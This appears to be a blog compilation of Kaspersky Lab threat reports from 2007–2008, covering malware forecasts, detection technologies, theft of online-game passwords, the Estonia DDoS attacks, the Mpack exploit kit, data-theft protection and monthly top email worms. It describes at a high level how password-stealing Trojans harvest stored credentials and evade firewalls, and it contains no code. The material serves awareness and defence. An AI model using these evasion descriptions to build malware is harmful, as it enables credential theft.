These were the principal events of 2007, a year that turned out to be the most “viral” year in history. The total number of IT threats more than doubled during the year. In 2007, Kaspersky Lab added almost as many signatures to its databases as it had during the preceding 15 years. Internet users had never been exposed to such a deluge of threats before, and we had to make every conceivable (and, sometimes, inconceivable) effort to get the better of these threats. This raises serious concerns, because, unless the situation radically changes in 2008 (which is highly unlikely), the number of threats will double again by the end of the year.

Forecasts
1. Malware 2.0
The evolution of malware from individual malicious programs towards sophisticated integrated projects began four years ago with a modular component system used in the Bagle worm. The new malicious program operating model, the effectiveness of which was demonstrated in 2007 by the Storm Worm, will not only become a standard on which a host of new malicious projects will be based, but will also be further developed and perfected.

The model has the following main features:

A network of infected computers is not centrally controlled.
The malware actively resists third-party attempts to analyze its malicious activity and take control of it.
Malicious code is distributed to a large number of computers, but this distribution is performed over a limited period of time.
Social engineering methods are skillfully used.
Different methods are used for malware distribution, with the most obvious methods (such as email) gradually losing popularity.
Different functions are performed by different modules (instead of the all-in-one design).
The new generation of malicious programs can be regarded as Malware 2.0. These techniques are used by such malicious programs as Bagle, Zhelatin and Warezov, which are mostly spam-oriented. At the same time, several banking and game Trojan families are also showing signs of evolving towards the Malware 2.0 paradigm.

2. Rootkits and “bootkits”
Technologies that mask the presence of malicious programs in the system (rootkits) will be used not only by Trojans, but by file viruses as well. One dangerous method of masking the presence of malware in the system is based on infecting the hard drive’s boot sector (programs that do this are called bootkits). This is a reincarnation of an old technique, which allows a malicious program to take control before the operating system (and antivirus software) fully boots. In 2007, this method was used by Backdoor.Win32.Sinowal. This is a significant threat, which could become one of the most dangerous information security threats of 2008.

3. File viruses
File viruses will continue their comeback. As before, they will be developed primarily by Chinese cybercriminals and will target users of online games. The authors of Zhelatin or Warezov might well use file infection as well, since this can provide them with one more efficient distribution method.

In 2008, we can expect a surge in the number of incidents involving infected game and program distribution packages available from popular websites or via P2P networks. Viruses will target those files which users provide to other users, since in many cases this method of spreading is even more effective than sending infected files by email.

4. Attacks targeting social networks
In 2008, phishing will increasingly target users of social networks. User account data for such services as Facebook, MySpaces, Livejournal, Blogger etc. will be in demand among cybercriminals. This will become an important alternative to distribution methods based on putting malicious programs onto hacked websites. In 2008, many Trojans will be distributed through accounts of social network users, via their weblogs and profiles.

XSS / PHP / SQL attacks will be one more problem associated with social networks. Unlike phishing, which is based on fraud and social engineering methods only, these attacks take advantage of errors and vulnerabilities in Web 2.0 services. Consequently, even the most experienced users can be affected. These attacks, like all the others, will target users’ private data and will be used to create databases and/or lists to conduct further attacks involving “traditional” methods.

5. Mobile threats
As regards mobile devices and, specifically, mobile phones, threats will include primitive Trojans such as the Skuller family for Symbian and the “first Trojan” for the iPhone, as well as various vulnerabilities in smartphone operating systems and applications. A global epidemic of a mobile worm is still unlikely, though, from a technical point of view, it is possible. In 2007, the consolidation of the mobile operating system market between Symbian and Windows Mobile was disrupted somewhat by the launch of the iPhone and the announcement by Google of Android, its new mobile platform. As a result of the iPhone’s popularity and newcomer status, it is likely to attract more attention from cybercriminals than other mobile devices, especially if Apple makes its iPhone software development tools (SDK) available to the public, as they promised in late 2007.

MalCode Evolution

Although the title seems to reference the full spectrum of technologies used to detect malicious code, the article focuses on nonsignature technologies.

At the beginning of the article the author points out that any technology used to detect malicious code has two components – a technical component and an analytical component. The technical component is the sum of all functions and algorithms which provide the analytical component with data for analysis. The analytical component is a decision making system which delivers a verdict on the data analysed.

The technical component. The technical component of a malware detection system collects data that will be used to analyze the situation.

As any malicious program is both a file with specific content and the sum of the effects the malicious program has on the operating system, there are a range of methods used to collect data in order to identify malicious code. These methods are listed in order of abstraction. The term abstraction is used to denote the point of view from which the program being run is viewed: as an original digital object (a collection of bytes), as a behaviour (more abstract than the collection of bytes) or as the sum of effects on the operating system (more abstract than the behaviour). Antivirus technology has, more or less, evolved along these lines: working with files, working with events via a file, working with a file via events, and working with the environment itself. Consequently, the list given in the article illustrates a natural chronology.

The very first antivirus programs analyzed file code which was treated as byte sequences.
Using this method means that only the source byte code of a program is analyzed; program behaviour is not taken into account. Today, this method continues to be used in antivirus software - not as the sole detection method, but as a complement to other technologies.

Emulating program code.
Emulation involves imitating the work of one system using another system without losing functionality and without distorting results. In relation to antivirus software, the emulator breaks down a program's byte code into commands, and then launches each commend in a virtual copy of the computer environment. In other words, while an emulator works with a file, it does analyze events. Emulation makes it possible to observe a program’s behaviour without putting the operating system and user data at risk.

Virtualization: launching a program in a sandbox.
A sandbox is an environment which uses partial or total restrictions or emulation of the resources of the operating system to ensure that a program can be safely launched in the space. In this case, virtualization makes it possible to work works with a program that is running in a real environment but the environment is strictly controlled. Using the metaphor of a child in the playground, the operating system represents the world, the malicious program is the child, and the constraints within which the child plays are the confines of the sandbox: a set of rules for interaction between the program and the operating system. Any point of contact between the program and its environment (such as the file system and system registry) can be virtualized. Whereas emulation provides an environment in which programs can be run, virtualization uses the operating system itself as the environment, with the sandbox controlling the interaction between the environment and the program.

Monitoring system events.
Whereas an emulator or sandbox observes each program separately; monitoring technology observes all programs simultaneously by registering all operating system events created by running programs. This technology is currently the most rapidly evolving. However, it is not the most fail-safe technology, as the risk created when launching a program in a real environment significantly lowers the level of protection. Additionally, the monitoring technology can be deceived by the malicious program.

Searching for system anomalies.
This method makes use of the following features:

an operating system, together with the programs running within that system, is an integrated system;
the operating system has an intrinsic “system status”;
if malicious code is run in the environment, then the system will have an “unhealthy" status; this differs from a system with a "healthy" status, in which there is no malicious code.
In order to detect malicious code effectively using this method, a relatively complex analytical system (such as an expert system or neural network) is required. Due to this complexity, the technology is still currently underdeveloped. At the moment, implementations in this area generally compare the condition of the system with a known standard, but this is not effective.

The analytical component. As for the analytical component, the sophistication of decision-making algorithms varies. Roughly speaking, they can be divided into three categories:

Simple comparison.
In this category, a verdict is issued based on the comparison of a single object with an available sample.

Complex comparison.
In this case a verdict is issued based on the comparison of one or several objects with corresponding samples. The templates used for comparison may be flexible, and the comparison gives a probability based result.

Expert systems.
In this category, a verdict is issued after a sophisticated analysis of data. An expert system may include elements of artificial intelligence.

The article then goes on to examines exactly which algorithms are used in which malware detection technologies. The technical component of a technology is responsible for features such as how resource-hungry a program is (and as a result, how quickly it works), security and protection. In general, the less abstract the form of protection, the more secure it will be, but the easier it will be to circumvent.

The analytical aspect of a technology is responsible for features such as proactivity (and the consequent impact on the necessity for frequent antivirus database updates), the false positive rate and the level of user involvement. This last denotes the extent to which a user needs to participate in defining protection policies: creating rules, exceptions and black and white lists. It also reflects the extent to which the user participates in the process of issuing verdicts by confirming or rejecting the suspicions of the analytical system. The more complex the analytical system, the more powerful the protection is. However, increased complexity means an increased number of false positives, which can be compensated for by greater user input.

The author concludes by offering recommendations on how to choose non-signature protection. She stresses that there is no universal or ‘best’ protection; each technology has its pluses and minuses. In choosing a product, the user should be guided by the results of independent tests, and reviews by users of established antivirus solutions.

Online gaming and Virus Arena

The article explains why online games have become so popular in recent years: they involve exploring magnificent virtual worlds and completing tasks - known as quests - which gain the players money, valuables and experience, not points as in a more traditional computer game. They can be purchased at stores or downloaded from the Internet, but in order to play there is usually a monthly subscription fee. The money from these monthly fees covers traffic costs, support for game servers and game development. New online games appear every year, and the number of players is constantly increasing.

Online games are played on both legitimate and rogue game servers, which appear in approximately equal numbers. Rogue servers are very popular among users such as students and adolescents who have very little money – why waste money on subscription fees if it's possible to play the same game for free on a rogue server? However, the author stresses that rogue servers are often set up with the aim of making money not from subscription fees, but from the sale of virtual items to players in exchange for real money. Such sales may also be conducted by the administrators of official servers, depending on the server policy.

The author does pose an interesting question – if server administrators are selling in-game items, is it legitimate for the players themselves to sell such items? The answer is yes, and this is often done in defiance of administrative rules. Certain sites on the Internet contain detailed information on the price of various in-game items, although the deals often are, more often than not, illegal.

Any in-game item can have a price in real money, which depends on demand. If there is a demand for certain in-game items or confidential data, they will be stolen. With particular knowledge, it is relatively easy to conduct such thefts – most game servers use passwords for authentication. Ñyber criminal activity is often blocked by the administrators of official game servers. However, criminal or dubious activity is unlikely to be investigated by the administrators of rogue servers, and victims cannot rely on the support of the administrators.

Online gamers are constantly targeted by cyber criminals, who use several methods in order to steal confidential data:

Social engineering.
One method used by cyber criminals is to enter a game or a forum on a game server and offer a bonus, or help in the game, in exchange for other players’ passwords. Naïve players looking for ways to make their life easier will often be tempted by such offers.

Another well-known social engineering method is phishing, where the cyber criminal sends phishing emails, purportedly from the server administrators, which invite the player to authenticate his/ her account via a website linked in the message.

Although such password harvesting techniques are simple and reasonably effective, they don't result in much profit for malicious users, as more advanced, “wealthy” players don’t take the bait.

Exploiting game server vulnerabilities.
Just like any other software, game server code contains programming errors and bugs. Such potential vulnerabilities can be exploited by cyber criminals to gain access to server databases and harvest player passwords or password hashes (encrypted passwords that can be decrypted using dedicated programs). For instance, there is a known vulnerability linked to in-game player chat which arises if the chat environment is not isolated from the game database. This makes it possible for a malicious user to harvest passwords directly from in-game chat.

The author highlights the fact that malicious users can exploit the system designed to remind users of forgotten passwords. The article also stresses that the number and type of vulnerabilities are directly linked to serve status - creating patches for rogue servers (if the administrators bother to do this) takes longer than patching vulnerabilities on official servers.

Exploiting game server vulnerabilities does require a certain amount of technical skill, which is why this method is not widely used.

Using malware.
This topic is covered extensively in the article. Malicious programs designed to steal passwords are spread using all means possible. Both malicious programs specifically tailored to steal any passwords and malicious programs which only target online game passwords may be used.

Programs classified by Kaspersky Lab as Trojan-PSW and Trojan-Spy (which intercept data entered via the keyboard and then transmit it to a remote malicious user) and variants of the Trojan.Win32.Qhost family (which modifies the hosts file containing the mapping of network addresses to domain names) are used to harvest passwords. Trojan-Spy.Win32.Delf has similar functionality, but configures a fake proxy server within the browser which is used when connecting to online game servers.

Using malicious programs to harvest passwords has proved effective and simple, and consequently very popular.

The article also covers the evolution of malicious programs which harvest passwords. The first recorded use of a malicious program to steal user passwords to online games was in 1997. Cyber criminals initially used classic keyloggers. The first Trojan specifically designed to target online games was Trojan-PSW.Win32.Lmir.a, which harvests passwords to "Legend of Mir". This program was the forerunner of a generation of Trojans targeting a wide range of online games.

Trojan-PSW.Win32.OnLineGames.a was another significant development, as this Trojan targets nearly all popular online games. Each new variant includes new games to be targeted.

A modern Trojan designed to steal passwords for online games is typically be a dynamic library written in Delphi that automatically connects to all applications launched in the system. When it detects that an online game has been launched, this kind of malicious program intercepts the password entered via the keyboard, sends the data to the malicious user's email and then deletes itself.

In addition to using Trojans to steal passwords, worms are also widely used. Their advantage is that they are able to infect executable files and to copy themselves to removable and network disks, as well as spreading via email.

Currently, the most recent achievement by those writing viruses for online games is the polymorphic Virus.Win32.Alman.a and its successor, Virus.Win32.Hala.a. In addition to the ability to infect executable files, these programs are able to spread via network resources, mask their present in the system, and contain a backdoor function.

The authors of malicious code also attempt to protect their programs against antivirus solutions by using packers, anti-antivirus technologies, and rootkit technologies, which mask the presence of the malicious program in the system. Recent malicious programs which target online games include all three types of self-defense mechanism.

The article also examines how attacks are conducted using a worm in order to harvest online gaming passwords. Malicious users create a worm with multiple functions: an email worm, network worm, p2p worm, rootkit, executable file infector and password stealing functionality all in one package. The worm will then be mass mailed, and an incautious user who clicks on a link in a malicious message can find himself in an unenviable position.

The author covers password theft in terms of geographical location, stating that over 90% of all Trojans targeting online games are written in China, and 90% of the passwords stolen by these Trojans belong to players on South Korean sites. Computerization and the rapid growth of IT in Russia have naturally also had an impact on the evolution of computer entertainment – online games which do not have a separate client, but which are played within the browser have become extremely popular. This popularity has led to an increase in phishing attacks in which messages containing links to cloned gaming sites are spread. The article also includes statistics demonstrating the increase in the number of malicious programs, and the extent to which individual games are targeted by cyber criminals.

The author concludes that those making a living from other people's virtual property are almost immune from a legal point of view. It is the game developers themselves who should tackle this issue, in conjunction with antivirus companies. In 2004, an agreement between Kaspersky Lab and the developers of the Russian online game Fight Club made it possible to prevent the theft of thousands of passwords and the sale of in-game items which would have been worth a five figure sum in 'real' US dollars.

The article concludes by expressing the opinion that those who are being targeted (i.e. the gamers) should take matters into their own hands by using common sense, exercising caution and installing the best security solution available.

MalwareVolution>

The events in Estonia in late April and early May will likely remain the most discussed events in 2007. Dozens of servers on the Estonian Internet were targeted by DDoS attacks after the Estonian police broke up a demonstration in Tallinn, where protestors spoke out against the Estonian government's decision to remove a monument from one of the city's central squares. (The monument commemorated Soviet soldiers who fell while liberating Estonia during WWII.) The websites of the president, the prime minister, the parliament, the police and a number of ministries were overloaded with an enormous number of requests from thousands of computers located around the world. In addition to the DoS attacks, which were primarily targeted at government websites, dozens of other Estonian websites were defaced.

Estonian politicians blamed the Russian special services for the attacks. This was the first time that the word "cyberwar" was used by such highly placed officials. Estonia asked NATO to view the cyber attacks as military action and ultimately requested military protection from threats stemming from the Internet.

What happened on the Russian Internet during this period? As soon as skirmishes between protesters and the police began in Estonia, many Russian Internet users took the only opportunity they had to voice their protest against the actions of the Estonian government - an online protest. This took the form of DoS attacks. A number of different programs began to appear on forums and websites, and they were used to send innumerable requests to Estonian websites. Any person could download this kind of program and launch it on their own computer. In technical terms, this creates a botnet. However, this botnet was constructed with the consent of computer owners who knew what they were doing. Of course, some of these attacks were sent from “real” botnets from previously infected machines, but one should not underestimate the power of this 'manual' attack. If such events can be called a cyberwar, then in this case the war involved guerilla combat.

There was no substantial evidence for the participation of Russian government bodies in these attacks. However, now the problems of cyberwar and cyber terrorism are being discussed round the world, and not just by security professionals, but also by politicians and military experts. Cyber terrorism is clearly not being discussed in ways appropriate to the current situation: too much dangerous information is being published, and readers are offered ready-made cyber terrorist scenarios. Kaspersky Lab has always held the opinion that the publication and discussion of different ways to bring down a target cannot be described as anything but reprehensible. There is no doubt that any such information could provoke certain extremist groups to attempt to spark off a similar scenario. And now Pandora’s box has been opened.

The biggest global event in the cell phone industry in the second quarter of 2007 - or probably the entire year - was the release of Apple's new iPhone. It's predicted that sales over the first 18 months to reach 13.5 million units. Will the iPhone’s popularity act as a tipping point, upsetting the stagnant status quo in the world of mobile viruses? According to our estimates, we can conclude that the year 2008 is when we can expect to see virus problems for the iPhone become a reality. Malicious programs for the iPhone probably won't be worms. Instead, they will probably be typical file viruses and a variety of Trojans. But the biggest threat for iPhone users will be the different vulnerabilities that could be used by malicious users to access information stored on the phone.

Mpack. The authors of malicious programs have begun giving preference to using various vulnerabilities in order to penetrate systems. In mid-June this year, over six thousand Italian servers were detected with websites that included a few strings of malicious html, similar to:

This is a typical construction used to exploit a range of browser vulnerabilities and Kaspersky Lab analysts have been very familiar with it for a number of years now. What happens, and how? There is a certain bundle of exploits that take advantage of the vulnerabilities in popular web browsers and operating systems. Malicious users post these exploits on their own website. In order to attract users to visit the site, they gain access to other websites, usually by using account access information that was previously stolen by a Trojan. Then, the iframe tag is added to all of these sites. The tag leads back to the infected site with the exploits. In the end, a Trojan Downloader is usually installed on the system under attack, which makes it possible to download more viruses, worms, backdoors, spyware, etc to the victim machine.

We were surprised that Mpack made it beyond the borders of Russia and was used in Italy. Here’s why: Mpack was created in Russia and was sold by Russian hackers to other Russian hackers. Its authors are very active when it came to creating and supporting the spread of the Trojan LdPinch. There are several other similar exploit bundles on the black market: Q406 Roll-up package, MDAC, WebAttacker, etc. All of these analogues have better 'success' rates when it comes to infecting systems than does Mpack.

We believe that the biggest problem is that it is extremely difficult to hold the authors of Mpack criminally responsible. They simply take exploits which were identified by other people and then published on IT security websites in the interests of improving security, but they take no responsibility for how these exploit bundles will be used. This is where we come to the age-old question: does disclosing information about vulnerabilities do more harm than good? We promise to return to this issue and voice our views on what’s going on today in terms of blackhat vs. whitehat.

In mid May we detected three variants of a new Trojan for cell phones: Trojan-SMS.SymbOS.Viver. This Trojan sends text messages to premium numbers. As a result, the subscriber who falls victim is charged a certain amount of money which is then transferred to the malicious user's account. In May we registered three such incidents, which just goes to show once again that today’s mobile technologies are continuing to attract the interest of cyber criminals. Unfortunately, we do not have statistics for most other countries, but it’s difficult to believe that this is an exclusively Russian problem.

The key events of the second quarter discussed in this report are certainly food for thought, but they still do not answer the question: what is the next step for viruses and information threats? Despite the emergence of new operating systems (such as Windows Vista), new services (mobile content) and devices (the iPhone), cyber criminals continue to lack initiative and are using tried and tested ways of attacking Internet users. Furthermore, we are seeing a significant return to “the sources”: computers are increasingly the targets of DDoS attacks and attacks that use browser vulnerabilities to penetrate the system. Probably the only thing that distinguishes the present from three years ago is the fact that email is not being used as the primary vehicle for spreading viruses. Instead, instant messaging services are one of today’s key means of distribution. Another difference is that there has been an explosive increase in Trojans targeting the users of online games. The threats are not becoming “smarter.” Innovation has stagnated as development is now focused on cosmetic changes, and we still don't know what may ultimately serve as a catalyst for global changes to the virus landscape in the near future.

Antivirus companies have considerably improved their technologies and introduced several new technologies. Presently, antivirus company clients are protected much more effectively than two years ago. The average time that most new malicious programs survive in the wild has been cut down to a number of hours, and is rarely ever counted in days anymore.

But let’s predict what will happen next. Malicious users will attempt to reach beyond the protection antivirus solutions - a task that is a shift from “getting around” antivirus programs and implies more action in fields that have not yet been mastered by quality antivirus protection, or areas in which protection is not an option for any number of reasons. This is more than likely where the new front will be in the information war: online games, blogs, instant messaging and file swapping networks.

Saving your private RYAN against A smart Virus>

Classifying methods used to steal data
The United States Federal Trade Commission (FTC) views the issue of the theft of confidential data in the broadest sense. Their website provides information about many traditional "non-computerized" means of stealing information, such as stealing wallets and purses, searching through shredded papers that have been thrown in the garbage, making calls allegedly from a financial institution, and using special devices to scan credit card numbers, to name a few.

However, in addition to all these techniques, there are other ways of stealing information. There are at least three different ways to steal data using a computer. The first is when the computer user voluntarily gives information to a malicious user, having trusted a false request for said information. These requests usually come in the form of mass mailings. The malicious user will have created a false website that imitates the site of an actual bank or other financial organization. This kind of computer crime is called phishing.

The second way to steal confidential information involves tracking and logging a user's actions. This kind of electronic espionage is carried out using Trojans which Kaspersky Lab classifies as Trojan-Spy programs. One of the most popular kinds of Trojan-Spy program is the keylogger, covered in detail in a previous article.

The third technique for stealing confidential data involves the use of malicious programs (most often Trojans) to search for confidential information on a user’s computer and then transmit this data to a malicious user. In this case, a malicious user may only receive data that the user considered important enough to enter into the computer’s memory. However, this seeming drawback is compensated for by the fact that the data is transmitted without user participation. For more details about this technique, see: http://www.viruslist.com/en/virusesdescribed?chapter=152540521.

These malicious programs can spread in a number of ways: they can be activated when an email attachment is opened or when a user clicks on a link sent via instant messaging. They can also launch when a file is opened from a directory on a peer-to-peer network or by using scripts on a website that take advantage of idiosyncrasies in web browsers, making it possible for these programs to launch automatically when users visit these sites. Such programs can also be spread via other previously installed malicious programs that are capable of downloading and installing them to the system.

Malicious programs like PSW Trojans are designed to access a range of information about the system, the user and passwords to a number of programs and operating system services. In order to do this, they scan all storage areas which contain relevant data: Windows protected storage, registry keys and certain program files of interest to a malicious user (usually instant messaging clients, email systems and Internet browsers).

After gathering data, the Trojan will usually encrypt it and compress it into a small binary file. Later, the file may be sent via email or placed on the malicious user's FTP server.

The way in which the abovementioned malicious programs function is covered in detail in "Computers, Networks and Theft", which examines two different techniques used by modern security solutions to protect confidential data

How do today's products protect confidential data?
Almost all modern security solutions (such as Security Suite) include a component which protects confidential data, typically called Privacy Control. (In some applications, this component is combined with other security components, such as an anti-phishing component.) The key purpose of this component is to protect confidential information on the user's computer against unauthorized access and transmission.

Let’s take a look at how Symantec products implement protection for confidential data. This company was chosen because they were one of the first to implement protection for confidential data in their products, before other market players followed suit and added their own, similar components.

Back in late 1999, Symantec published information about their new product, Norton Internet Security 2000. This featured the new Norton Privacy Control, with one of its key modules being Confidential Data Blocking.

This component works in the following way:

the user must enter all data he considers confidential,
the product will then analyze all outgoing traffic from the user’s computer and either "cut up" all outgoing confidential data, or substitute it with meaningless symbols (such as “*”).

Figure 1. Norton Internet Security 2000 Confidential Data component

Norton’s Privacy Control component is included in new Norton products, such as Norton Personal Firewall and Norton Internet Security.

The company’s latest flagship product is Norton360, which was released by Symantec in 2007. The Privacy Control component is also included in Norton360, but not in the regular package. Instead, it comes as an Add-on Pack which can be downloaded from Symantec's official website.

Figure 2. Norton360 Confidential Data Blocking component

The main idea behind the product remains unchanged: just as Norton Internet Security 2000, it uses a table into which the user is meant to enter his confidential data (see figure 2).

Drawbacks in traditional approaches to protecting confidential data
What made the program’s developers decide to remove the Confidential Data protection component from the list of standard Norton360 modules? There are probably several reasons, but one stands out in particular. The truth is that this approach to protecting confidential information is not effective ─ it only creates the illusion of security.

Some official descriptions of the latest version of Norton Internet Security say that it "blocks […] transmitting unauthorized information''. However, this is not actually the case.

If you look carefully at the first window in Figure 2, you can see a note in the lower half of the window: Norton Add-on Pack cannot block confidential information on secure Web sites. However, secure Web sites already ensure your data is safe.” The reason for this note is simple: data exchange with secure websites uses data encryption, which makes it impossible for any third party to analyze the data transmitted.

A confidential data protection component should protect users from Trojans like PSW Trojans. What prevents a Trojan from encrypting all data being transmitted? Nothing, actually, and over 80% of Trojans do just that. That is why the confidential data protection component - which is based on traffic analysis and searching for previously entered data sequences - is not capable of preventing data from being sent out in most cases, since it simply will not find the data once it has been encrypted by a Trojan.

Furthermore, storing all your confidential information in one place after entering the data in windows like the ones in Figure 2 cannot do anything to increase security. On the contrary, instead of having to search through all kinds of data in several places on a computer's file system, a malicious user knows right where to go and all he has to do is gain access to the file used by the protection component. There is no doubt that developers do everything they can to secure the data entered by the user, but security cannot be guaranteed.

An example of how this component works is as follows: if a webpage asks you to enter your telephone number, Norton Internet Security 2000 will ask you if you are sure that you want to send this confidential data after you have entered it into the text field. However, that warning is not especially helpful in real life, since the user decision to enter the requested information is based on whether or not s/he trusts the website. If the user believes the website is authentic, then the program warning will not stop the user from entering data. If the user believes the website is fraudulent, then he will not bother to enter any data in the first place.

Unfortunately, today there are more and more fraudulent websites designed by malicious users to look very similar to the official websites of financial institutions, and users willingly enter their confidential data despite security solution warnings.

An alternative approach to protecting confidential data
There is another approach to protecting confidential data based on blocking the actions of malicious programs at earlier stages, before data is transmitted, and before it is too late.

In order to steal confidential information, a malicious program must take two actions: find the information and extract it from wherever it is being stored (that could be a file, a registry key, or an operating system's special storage area) and transmit it to the author of the malicious program via specific channels. Since many computers already have firewalls installed which control the network activity of applications on the computer, the malicious program cannot transmit any collected data under its own name. That is why many PSW Trojans use different tactics to evade firewall protection, making them able to send data without the user's knowledge.

It should then follow that the protection component should track the activity of applications when that activity is indicative of a potential attempt to steal confidential information:

An attempt to gain access to personal data or passwords located in Microsoft Windows’ Protected Storage.
This service is used to store confidential data, such as local passwords, passwords for POP and SMTP email servers, Internet access passwords, passwords for automatic access to closed website sections, other Internet data and passwords for automatically filling out Internet forms, and other information. These data are entered into the relevant text field of email clients and web browsers. As a rule, the user may store the entered data; in order to do so, he needs to mark it with a special flag. In this case, the data that is entered is stored in Microsoft Windows Protected Storage.

Even users who are concerned about information leaks and do not save passwords or other data in their Internet browser usually save their email passwords, since entering their password each time they receive or send something is too time consuming. Since many Internet providers use the same password for email and for Internet access, obtaining this password will give a malicious user access to both the email account and the Internet connection settings.

Attempts to stealth data sending.
In order to transmit the data it has collected, a malicious program will try different tactics to get around a firewall if one is installed on the victim computer. For example, it may stealthily launch an Internet browser process and transmit data using program interfaces common to most browsers (COM, OLE, DDE and others). Since most modern firewalls have a set of pre-installed settings that permit network activity for trusted applications, the firewall will not react to the transmission of data by the Internet browser and the user will not be aware of this activity nor will he be able to prevent the data leak.

When using this approach, encryption of stolen data by a malicious program is not a problem, as the malicious program's payload will be blocked before encrypted information can be transmitted.

This approach is implemented in Kaspersky Internet Security 7.0.

Trojan-PSW.Win32.LdPinch: how KIS 7.0 protects against the theft of confidential data
Kaspersky Internet Security 7.0 also features a confidential data protection module that serves as one of the subsystems of its Anti-Spyware component (see Figure 3). It analyzes the behavior of all processes in the user's system and if it detects either of two of types of action described above, it will either warn the user or automatically block the action.

Figure 3. Configuring Kaspersky Internet Security 7.0 Anti-Spyware component

Let’s examine how this KIS module protects users against attempts to steal confidential data using Trojan-PSW.Win32.LdPinch as an example. This Trojan's main goal is to steal passwords from a range of applications installed on a user's computer.

As this virus description shows, Trojan-PSW.Win32.LdPinch is designed to steal information about a computer's hard drive and the amount of free space remaining on it, the current user, the computer's network name, the version of the operating system, the processor type, the monitor specifications, the applications installed on the computer, the current running processes and any existing dial-up connections. Of course, most of the information it steals are passwords for a wide range of programs, including the following:

instant messaging clients:
ICQ 99B-2002a
ICQ 2003/Lite/5/Rambler
Miranda IM
TRILLIAN
&RQ, RnQ, The Rat
QIP
GAIM
MSN & Live Messenger
email clients:
The Bat!
MS Office Outlook
Mail.Ru Agent
Becky
Eudora
Mozilla Thunderbird
Gmail Notifier
Internet browsers:
Opera
Protected Storage(IE,Outlook Express)
Mozilla Browser
Mozilla Firefox
automatic dialers:
RAS
E-DIALER
VDialer
file managers:
FAR
Windows/Total Commander
FTP clients:
CuteFTP
WS FTP
FileZilla
Flash FXP
Smart FTP
Coffee Cup FTP
and many others.

Stolen passwords are used to further spread malicious programs. Once a password for an ICQ client is obtained, for example, the Trojan will modify this password on the ICQ website and begin sending messages with a link to its own executable file from the victim’s account in an attempt to infect as many machines as possible.

All stolen data is encrypted and sent either to a specific email address or placed on the malicious user's FTP server.

Confidential data protection systems which analyze traffic (such as Norton Privacy Control) cannot prevent encrypted data from being sent, even if the user enters all of his passwords to all of his programs in a list of monitored data. That means that if a user has installed a Symantec program with Privacy Control or another product that uses the same approach to protect confidential information, his computer may be attacked by a new version of Trojan-PSW.Win32.LdPinch that is not included in the antivirus database and is not recognized by any of the other security components. As a result, most of that user’s passwords will be stolen and then used by cyber criminals at their discretion.

However, a protection system which analyzes application activity blocks both the harvesting (see Figure 4) and stealthed transmission (see Figure 5) of confidential data by Trojan-PSW.Win32.LdPinch.

Figure 4. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch
attempt to gain access to confidential data

Figure 5. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch
attempt to secretly transmit confidential data

Conclusion
This article covers the classification of methods used by malicious users to steal information via computer, and analyzes two fundamentally different techniques in developing modules which protect confidential data. Such modules are implemented in contemporary security solutions. The article also analyzes the effectiveness of both approaches, using a widely known Trojan as an example.

A comparison of both techniques shows that the technique based on analyzing application activity that could indicate an attempt to steal confidential data has major advantages. The approach using a list created by the user for his eyes only has been shown to be less effective, as it is more difficult to ensure that no part of that list is ever transmitted from the user's computer.

Computer Viruses and There Analysis

2008-06-07T09:15:00.000-07:00

Top 20 Viruses for May 20th 2008

Position Change in position Name Proactive Detection Flag Percentage
1. 0 Email-Worm.Win32.NetSky.q Trojan.generic 23.12
2. +1 Email-Worm.Win32.NetSky.y Trojan.generic 9.70
3. +2 Email-Worm.Win32.Scano.gen Trojan.generic 9.63
4. +4 Email-Worm.Win32.Nyxem.e Trojan.generic 6.75
5. -3 Email-Worm.Win32.NetSky.d Trojan.generic 6.27
6. Return Email-Worm.Win32.NetSky.x Trojan.generic 4.44
7. -1 Email-Worm.Win32.NetSky.aa Trojan.generic 3.74
8. Return Email-Worm.Win32.NetSky.b Trojan.generic 3.26
9. -5 Email-Worm.Win32.Bagle.gt Trojan.generic 2.75
10. Return Net-Worm.Win32.Mytob.u Worm.P2P.generic 2.60
11. +6 Net-Worm.Win32.Mytob.c Trojan.generic 2.40
12. 0 Email-Worm.Win32.Scano.bn Trojan.generic 2.09
13. Return Email-Worm.Win32.NetSky.r Trojan.generic 1.98
14. +4 Email-Worm.Win32.NetSky.t Trojan.generic 1.94
15. Return Net-Worm.Win32.Mytob.bi Trojan.generic 1.65
16. -5 Email-Worm.Win32.Bagle.gen Trojan.generic 1.39
17. -4 Email-Worm.Win32.Mydoom.l Worm.P2P.generic 1.19
18. Return Net-Worm.Win32.Mytob.t Worm.P2P.generic 1.08
19. -3 Email-Worm.Win32.NetSky.c Trojan.generic 0.97
20. New! Net-Worm.Win32.Mytob.cg Worm.P2P.generic 0.90
Other malicious programs 12.15

The May 2008 Email Top Twenty is a short one; this is explained by the well-known fact that virus writers take a break over the summer months. The complete absence of any epidemics in mail traffic, which is obvious from even a cursory glance at this month's rankings, bears this out.

In fact, the only significant change to the rankings was caused by the re-entry of a few worms which have been in circulation for several years now.

Trojan-Downloader programs such as Agent.ica, Agent.hsl, and Diehard that were active during the first four months of 2008 disappeared without trace in May.

The Warezov and Zhelatin worms have not reappeared since dropping out of the Top Twenty back in February. The authors have stopped sending out the executable components of the worms by email, confining themselves to distributing the code via links on infected websites.

This does mean that the threat posed by malicious code in email has declined. However, phishing and spam continue to pose very real threats and have the potential to create just as big a problem for the end user.

Other malicious programs made up a significant percentage (12.15%) of all malicious code found in mail traffic.

The Top Twenty countries which acted as sources of infected emails in May are shown below:

Position Change Country Percentage
1 0 USA 21.72
2 +5 Poland 13.18
3 -1 South Korea 7.88
4 -1 Spain 5.85
5 -1 China 5.15
6 0 France 4.07
7 +1 Germany 3.54
8 -1 Brazil 3.49
9 0 United Kingdom 2.83
10 -2 India 2.82
11 -1 Italy 2.66
12 -1 Isreal 1.80
13 0 Japan 1.66
14 +5 Canada 1.15
15 +2 The Netherlands 1.07
16 -1 Turkey 1.05
17 -1 Australia 1.03
18 -4 Argentina 1.02
19 +1 Russia 0.99
20 New! Austria 0.91
Other Countries 16.13

Summary
Moved up: Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.Nyxem.e, Net-Worm.Win32.Mytob.c, Email-Worm.Win32.NetSky.t.
Moved down: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.NetSky.c.
